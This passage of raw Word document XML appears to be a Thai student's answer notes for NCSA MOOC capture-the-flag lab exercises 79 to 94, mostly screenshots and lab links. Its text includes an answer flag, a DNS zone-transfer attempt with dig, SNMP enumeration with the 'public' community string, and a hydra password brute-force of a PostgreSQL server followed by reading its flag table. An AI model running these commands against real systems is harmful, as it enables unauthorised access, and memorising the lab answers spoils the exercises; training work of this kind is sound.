            <wp:docPr id="66802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2783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04A3A" w:rsidRDefault="00604A3A" w14:paraId="6CE00B3D" w14:textId="77777777"/>
    <w:p w:rsidR="00604A3A" w:rsidP="00604A3A" w:rsidRDefault="00604A3A" w14:paraId="66F2A39B" w14:textId="1B2C1556">
      <w:hyperlink w:history="1" r:id="rId58">
        <w:r w:rsidRPr="000063FB">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://play.mooc.ncsa.or.th/lab/79</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00604A3A" w:rsidP="5F2E2CBF" w:rsidRDefault="00604A3A" w14:paraId="50D3C328" w14:textId="1FB55BC2">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Cordia New" w:hAnsi="Cordia New" w:eastAsia="Cordia New" w:cs="Cordia New"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:bidi="th-TH"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5F2E2CBF" w:rsidR="00604A3A">
        <w:rPr>
          <w:cs/>
        </w:rPr>
        <w:t>เหมือนข้อ 78</w:t>
      </w:r>
      <w:r w:rsidRPr="5F2E2CBF" w:rsidR="0F1DC68D">
        <w:rPr>
          <w:cs/>
        </w:rPr>
        <w:t xml:space="preserve">  | </w:t>
      </w:r>
      <w:r w:rsidRPr="5F2E2CBF" w:rsidR="0F1DC68D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:bidi="th-TH"/>
        </w:rPr>
        <w:t>cut</w:t>
      </w:r>
      <w:r w:rsidRPr="5F2E2CBF" w:rsidR="0F1DC68D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:bidi="th-TH"/>
        </w:rPr>
        <w:t xml:space="preserve"> -c 4-13</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00604A3A" w:rsidRDefault="00604A3A" w14:paraId="521522A6" w14:textId="77777777"/>
    <w:p w:rsidR="00604A3A" w:rsidP="00604A3A" w:rsidRDefault="00604A3A" w14:paraId="47689DC9" w14:textId="026BDD6F">
      <w:hyperlink w:history="1" r:id="rId59">
        <w:r w:rsidRPr="000063FB">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://play.mooc.ncsa.or.th/lab/</w:t>
        </w:r>
        <w:r w:rsidRPr="000063FB">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:hint="cs"/>
            <w:cs/>
          </w:rPr>
          <w:t>80</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00604A3A" w:rsidRDefault="00604A3A" w14:paraId="7BDE0391" w14:textId="601A1F59">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6531762B" wp14:editId="3D39A64F">
            <wp:extent cx="5943600" cy="765810"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="15240"/>
            <wp:docPr id="26621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1389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005F64" w:rsidR="00604A3A" w:rsidRDefault="00604A3A" w14:paraId="17A375F9" w14:textId="35D94030">
      <w:r w:rsidR="00604A3A">
        <w:rPr/>
        <w:t>Blinux</w:t>
      </w:r>
      <w:r w:rsidR="00604A3A">
        <w:rPr/>
        <w:t>{</w:t>
      </w:r>
      <w:r w:rsidR="00604A3A">
        <w:rPr/>
        <w:t>knVsQUNjjX</w:t>
      </w:r>
      <w:r w:rsidR="00604A3A">
        <w:rPr/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5F2E2CBF" w:rsidRDefault="5F2E2CBF" w14:paraId="60CA46D9" w14:textId="16776480"/>
    <w:p w:rsidR="5F2E2CBF" w:rsidP="5F2E2CBF" w:rsidRDefault="5F2E2CBF" w14:paraId="525E6696" w14:textId="5172A76F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AED7C88" w:rsidP="5F2E2CBF" w:rsidRDefault="3AED7C88" w14:paraId="03E370C0" w14:textId="05A94F61">
      <w:pPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="160" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="Reccd2ccd34bb40e8">
        <w:r w:rsidRPr="5F2E2CBF" w:rsidR="3AED7C8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https://play.mooc.ncsa.or.th/lab/82</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="3AED7C88" w:rsidP="5F2E2CBF" w:rsidRDefault="3AED7C88" w14:paraId="1EF723B4" w14:textId="1C833A9D">
      <w:pPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="160" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidR="3AED7C88">
        <w:drawing>
          <wp:inline wp14:editId="4A1F14A9" wp14:anchorId="25A560DA">
            <wp:extent cx="5962650" cy="2600325"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1550057928" name="drawing" title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057928" name="Picture 1550057928"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId2006076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7C88" w:rsidP="5F2E2CBF" w:rsidRDefault="3AED7C88" w14:paraId="1449405B" w14:textId="6B046F6A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AED7C88" w:rsidP="5F2E2CBF" w:rsidRDefault="3AED7C88" w14:paraId="7145FBA1" w14:textId="7AC96E48">
      <w:pPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="160" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="Ra6411beb44f94909">
        <w:r w:rsidRPr="5F2E2CBF" w:rsidR="3AED7C8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https://play.mooc.ncsa.or.th/lab/83</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="3AED7C88" w:rsidP="5F2E2CBF" w:rsidRDefault="3AED7C88" w14:paraId="5EAE7493" w14:textId="368C59AB">
      <w:pPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="160" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidR="3AED7C88">
        <w:drawing>
          <wp:inline wp14:editId="19FAD644" wp14:anchorId="4F02C2D9">
            <wp:extent cx="3019425" cy="2514600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1481222719" name="drawing" title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1222719" name="Picture 1481222719"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId498278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7C88" w:rsidP="5F2E2CBF" w:rsidRDefault="3AED7C88" w14:paraId="58EED87B" w14:textId="68A02792">
      <w:pPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="160" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidR="3AED7C88">
        <w:drawing>
          <wp:inline wp14:editId="3BA4D6B3" wp14:anchorId="60127CD9">
            <wp:extent cx="3409950" cy="2533650"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="104601989" name="drawing" title="A computer screen shot of a program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601989" name="Picture 104601989"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId1148016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7C88" w:rsidP="5F2E2CBF" w:rsidRDefault="3AED7C88" w14:paraId="3AF5D866" w14:textId="35384EE9">
      <w:pPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="160" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidR="3AED7C88">
        <w:drawing>
          <wp:inline wp14:editId="7A736659" wp14:anchorId="26F746A2">
            <wp:extent cx="3438525" cy="895350"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1726020529" name="drawing" title="A computer screen shot of a code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6020529" name="Picture 1726020529"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId269357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7C88" w:rsidP="5F2E2CBF" w:rsidRDefault="3AED7C88" w14:paraId="30217448" w14:textId="5E741B6A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AED7C88" w:rsidP="5F2E2CBF" w:rsidRDefault="3AED7C88" w14:paraId="6E0CCC69" w14:textId="1B658CBF">
      <w:pPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="160" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="R15cf1a864f0b4d96">
        <w:r w:rsidRPr="5F2E2CBF" w:rsidR="3AED7C8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https://play.mooc.ncsa.or.th/lab/84</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="3AED7C88" w:rsidP="5F2E2CBF" w:rsidRDefault="3AED7C88" w14:paraId="72A874F8" w14:textId="27FC3F00">
      <w:pPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="160" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidR="3AED7C88">
        <w:drawing>
          <wp:inline wp14:editId="62E1429F" wp14:anchorId="3AB58AD7">
            <wp:extent cx="3829050" cy="3295650"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1223432477" name="drawing" title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3432477" name="Picture 1223432477"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId15498988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7C88" w:rsidP="5F2E2CBF" w:rsidRDefault="3AED7C88" w14:paraId="715AC861" w14:textId="36DC4E68">
      <w:pPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="160" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidR="3AED7C88">
        <w:drawing>
          <wp:inline wp14:editId="1F5C1E67" wp14:anchorId="6E5319FE">
            <wp:extent cx="3695700" cy="3657600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1838867059" name="drawing" title="A computer screen shot of a computer program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8867059" name="Picture 1838867059"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId2070025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7C88" w:rsidP="5F2E2CBF" w:rsidRDefault="3AED7C88" w14:paraId="6C6CBE69" w14:textId="7D4B9687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AED7C88" w:rsidP="5F2E2CBF" w:rsidRDefault="3AED7C88" w14:paraId="2E43F4DC" w14:textId="0B380BF0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AED7C88" w:rsidP="5F2E2CBF" w:rsidRDefault="3AED7C88" w14:paraId="13D77231" w14:textId="3BA5D5CA">
      <w:pPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="160" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="R3e8d87f46a7a4756">
        <w:r w:rsidRPr="5F2E2CBF" w:rsidR="3AED7C8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https://play.mooc.ncsa.or.th/lab/85</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="3AED7C88" w:rsidP="5F2E2CBF" w:rsidRDefault="3AED7C88" w14:paraId="02B32F8D" w14:textId="44C6B152">
      <w:pPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="160" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidR="3AED7C88">
        <w:drawing>
          <wp:inline wp14:editId="07976834" wp14:anchorId="1565B39E">
            <wp:extent cx="4438650" cy="3562350"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2063323055" name="drawing" title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323055" name="Picture 2063323055"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId2037046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7C88" w:rsidP="5F2E2CBF" w:rsidRDefault="3AED7C88" w14:paraId="22158D45" w14:textId="078781CE">
      <w:pPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="160" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidR="3AED7C88">
        <w:drawing>
          <wp:inline wp14:editId="4DBAC743" wp14:anchorId="0F78D796">
            <wp:extent cx="4324350" cy="1762125"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="34514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514100" name="Picture 34514100"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId612636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7C88" w:rsidP="5F2E2CBF" w:rsidRDefault="3AED7C88" w14:paraId="564FE9BD" w14:textId="23AD7C3B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AED7C88" w:rsidP="5F2E2CBF" w:rsidRDefault="3AED7C88" w14:paraId="0D1A08CF" w14:textId="68F4363F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AED7C88" w:rsidP="5F2E2CBF" w:rsidRDefault="3AED7C88" w14:paraId="1E9F68E2" w14:textId="7B2655A5">
      <w:pPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="160" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="Rb0364a0ecf6e4d8e">
        <w:r w:rsidRPr="5F2E2CBF" w:rsidR="3AED7C8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https://play.mooc.ncsa.or.th/lab/86</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="3AED7C88" w:rsidP="5F2E2CBF" w:rsidRDefault="3AED7C88" w14:paraId="2F0F0AD2" w14:textId="3B01F266">
      <w:pPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="160" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidR="3AED7C88">
        <w:drawing>
          <wp:inline wp14:editId="6C636F34" wp14:anchorId="18AB65A0">
            <wp:extent cx="4552950" cy="2647950"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2102168631" name="drawing" title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2168631" name="Picture 2102168631"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId1806258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7C88" w:rsidP="5F2E2CBF" w:rsidRDefault="3AED7C88" w14:paraId="600D8866" w14:textId="49EC59B8">
      <w:pPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="160" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidR="3AED7C88">
        <w:drawing>
          <wp:inline wp14:editId="047211E9" wp14:anchorId="41294D15">
            <wp:extent cx="4619625" cy="1914525"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1517584099" name="drawing" title="A computer screen shot of a computer code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7584099" name="Picture 1517584099"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId712365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7C88" w:rsidP="5F2E2CBF" w:rsidRDefault="3AED7C88" w14:paraId="1A93C925" w14:textId="5B1BD26E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AED7C88" w:rsidP="5F2E2CBF" w:rsidRDefault="3AED7C88" w14:paraId="31B6273A" w14:textId="3105B6DE">
      <w:pPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="160" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="Rf1af97ae09704a2c">
        <w:r w:rsidRPr="5F2E2CBF" w:rsidR="3AED7C88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https://play.mooc.ncsa.or.th/lab/88</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="3AED7C88" w:rsidP="5F2E2CBF" w:rsidRDefault="3AED7C88" w14:paraId="5783DF18" w14:textId="7B83ACD1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de-DE"/>
        </w:rPr>
        <w:t>dig @</w:t>
      </w:r>
      <w:r w:rsidRPr="5F2E2CBF" w:rsidR="3AED7C88">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="de-DE"/>
        </w:rPr>
        <w:t>35.197.154.5</w:t>
      </w:r>
      <w:r w:rsidRPr="5F2E2CBF" w:rsidR="3AED7C8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ggez.org AFXR </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3AED7C88" w:rsidP="5F2E2CBF" w:rsidRDefault="3AED7C88" w14:paraId="6F6EDFB9" w14:textId="0E2B31C4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de"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3AED7C88" w:rsidP="5F2E2CBF" w:rsidRDefault="3AED7C88" w14:paraId="27CDC5F3" w14:textId="70DAA77F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de"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3AED7C88" w:rsidP="5F2E2CBF" w:rsidRDefault="3AED7C88" w14:paraId="21B684FA" w14:textId="49E4E5C4">
      <w:pPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="160" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="R12766a3b49664772">
        <w:r w:rsidRPr="5F2E2CBF" w:rsidR="3AED7C88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de"/>
          </w:rPr>
          <w:t>https://play.mooc.ncsa.or.th/lab/89</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="3AED7C88" w:rsidP="5F2E2CBF" w:rsidRDefault="3AED7C88" w14:paraId="53A8D631" w14:textId="2B446211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>sudo snmpwalk -c public -v 2c  149.28.159.195:161</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3AED7C88" w:rsidP="5F2E2CBF" w:rsidRDefault="3AED7C88" w14:paraId="2F3DB901" w14:textId="25708157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AED7C88" w:rsidP="5F2E2CBF" w:rsidRDefault="3AED7C88" w14:paraId="2DF57DD5" w14:textId="2311C51E">
      <w:pPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="160" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="R7aeae8ecdeda44e1">
        <w:r w:rsidRPr="5F2E2CBF" w:rsidR="3AED7C88">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
            <w:strike w:val="0"/>
            <w:dstrike w:val="0"/>
            <w:noProof w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>https://play.mooc.ncsa.or.th/lab/</w:t>
        </w:r>
        <w:r w:rsidRPr="5F2E2CBF" w:rsidR="3AED7C88">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Cordia New" w:hAnsi="Cordia New" w:eastAsia="Cordia New" w:cs="Cordia New"/>
            <w:strike w:val="0"/>
            <w:dstrike w:val="0"/>
            <w:noProof w:val="0"/>
            <w:color w:val="467886"/>
            <w:sz w:val="30"/>
            <w:szCs w:val="30"/>
            <w:u w:val="single"/>
            <w:lang w:val="th"/>
          </w:rPr>
          <w:t>90</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="3AED7C88" w:rsidP="5F2E2CBF" w:rsidRDefault="3AED7C88" w14:paraId="58C96087" w14:textId="73B06799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de"/>
        </w:rPr>
        <w:t xml:space="preserve">snmp-check </w:t>
      </w:r>
      <w:r w:rsidRPr="5F2E2CBF" w:rsidR="3AED7C88">
        <w:rPr>
          <w:rFonts w:ascii="Cordia New" w:hAnsi="Cordia New" w:eastAsia="Cordia New" w:cs="Cordia New"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:val="th"/>
        </w:rPr>
        <w:t>149.28.159.195 -</w:t>
      </w:r>
      <w:r w:rsidRPr="5F2E2CBF" w:rsidR="3AED7C88">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="de"/>
        </w:rPr>
        <w:t>c public</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3AED7C88" w:rsidP="5F2E2CBF" w:rsidRDefault="3AED7C88" w14:paraId="3CB3B592" w14:textId="785CAF31">
      <w:pPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="160" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidR="3AED7C88">
        <w:drawing>
          <wp:inline wp14:editId="22E393FA" wp14:anchorId="4B051603">
            <wp:extent cx="5962650" cy="1962150"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="927283269" name="drawing" title="A computer screen shot of a program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283269" name="Picture 927283269"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId424892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7C88" w:rsidP="5F2E2CBF" w:rsidRDefault="3AED7C88" w14:paraId="2B05C031" w14:textId="0A3F8E74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de"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3AED7C88" w:rsidP="5F2E2CBF" w:rsidRDefault="3AED7C88" w14:paraId="51D73E33" w14:textId="2304D5C3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de"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3AED7C88" w:rsidP="5F2E2CBF" w:rsidRDefault="3AED7C88" w14:paraId="0B6D099B" w14:textId="1BA26714">
      <w:pPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="160" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="Rc3eb113d9cf94e39">
        <w:r w:rsidRPr="5F2E2CBF" w:rsidR="3AED7C88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de"/>
          </w:rPr>
          <w:t>https://play.mooc.ncsa.or.th/lab/91</w:t>
        </w:r>
      </w:hyperlink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AED7C88" w:rsidP="5F2E2CBF" w:rsidRDefault="3AED7C88" w14:paraId="236F708F" w14:textId="0156103E">
      <w:pPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="160" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidR="3AED7C88">
        <w:drawing>
          <wp:inline wp14:editId="55071282" wp14:anchorId="3E0B3988">
            <wp:extent cx="4438650" cy="4295775"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="346329522" name="drawing" title="A computer screen shot of a black screen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6329522" name="Picture 346329522"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId1273050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7C88" w:rsidP="5F2E2CBF" w:rsidRDefault="3AED7C88" w14:paraId="25AE1E36" w14:textId="6EC68972">
      <w:pPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="160" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="R58c37021590245d3">
        <w:r w:rsidRPr="5F2E2CBF" w:rsidR="3AED7C88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de"/>
          </w:rPr>
          <w:t>https://play.mooc.ncsa.or.th/lab/92</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="3AED7C88" w:rsidP="5F2E2CBF" w:rsidRDefault="3AED7C88" w14:paraId="7E2696D1" w14:textId="50708CF2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de-DE"/>
        </w:rPr>
        <w:t>hydra -l postgres -P password.txt 35.240.231.40 postgres</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3AED7C88" w:rsidP="5F2E2CBF" w:rsidRDefault="3AED7C88" w14:paraId="76B24F8B" w14:textId="33075DEA">
      <w:pPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="160" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidR="3AED7C88">
        <w:drawing>
          <wp:inline wp14:editId="55B2158C" wp14:anchorId="1464AF47">
            <wp:extent cx="3667125" cy="3009900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1190243218" name="drawing" title="A computer screen shot of a computer program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0243218" name="Picture 1190243218"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId1115365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7C88" w:rsidP="5F2E2CBF" w:rsidRDefault="3AED7C88" w14:paraId="03526549" w14:textId="09C8E4D2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>psql -h 35.240.231.40 -U postgres</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3AED7C88" w:rsidP="5F2E2CBF" w:rsidRDefault="3AED7C88" w14:paraId="28AB5CBB" w14:textId="49AF8F8F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>\dt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3AED7C88" w:rsidP="5F2E2CBF" w:rsidRDefault="3AED7C88" w14:paraId="5F6DCA87" w14:textId="69AC470E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>select * from flag;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3AED7C88" w:rsidP="5F2E2CBF" w:rsidRDefault="3AED7C88" w14:paraId="03C1891C" w14:textId="51BD4FE1">
      <w:pPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="160" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidR="3AED7C88">
        <w:drawing>
          <wp:inline wp14:editId="1E1F1A10" wp14:anchorId="4156112F">
            <wp:extent cx="3114675" cy="2695575"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1047785613" name="drawing" title="A computer screen shot of a program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7785613" name="Picture 1047785613"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId584723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7C88" w:rsidP="5F2E2CBF" w:rsidRDefault="3AED7C88" w14:paraId="1D17421C" w14:textId="1219D2EA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AED7C88" w:rsidP="5F2E2CBF" w:rsidRDefault="3AED7C88" w14:paraId="57A06341" w14:textId="5EF7580A">
      <w:pPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="160" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="R037a08a56c024869">
        <w:r w:rsidRPr="5F2E2CBF" w:rsidR="3AED7C88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https://play.mooc.ncsa.or.th/lab/93</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="3AED7C88" w:rsidP="5F2E2CBF" w:rsidRDefault="3AED7C88" w14:paraId="516F654E" w14:textId="033879C6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AED7C88" w:rsidP="5F2E2CBF" w:rsidRDefault="3AED7C88" w14:paraId="44235C1D" w14:textId="1FDDEA49">
      <w:pPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="160" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidR="3AED7C88">
        <w:drawing>
          <wp:inline wp14:editId="4D202657" wp14:anchorId="3C42C146">
            <wp:extent cx="3419475" cy="2800350"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="907690519" name="drawing" title="A computer screen shot of a computer code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7690519" name="Picture 907690519"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId21468475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7C88" w:rsidP="5F2E2CBF" w:rsidRDefault="3AED7C88" w14:paraId="3846F938" w14:textId="50EFC58B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AED7C88" w:rsidP="5F2E2CBF" w:rsidRDefault="3AED7C88" w14:paraId="5FCFE942" w14:textId="39B821CD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AED7C88" w:rsidP="5F2E2CBF" w:rsidRDefault="3AED7C88" w14:paraId="5B69AE0F" w14:textId="245AB6C2">
      <w:pPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="160" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="R91fbcf12c1314c9a">
        <w:r w:rsidRPr="5F2E2CBF" w:rsidR="3AED7C88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https://play.mooc.ncsa.or.th/lab/94</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
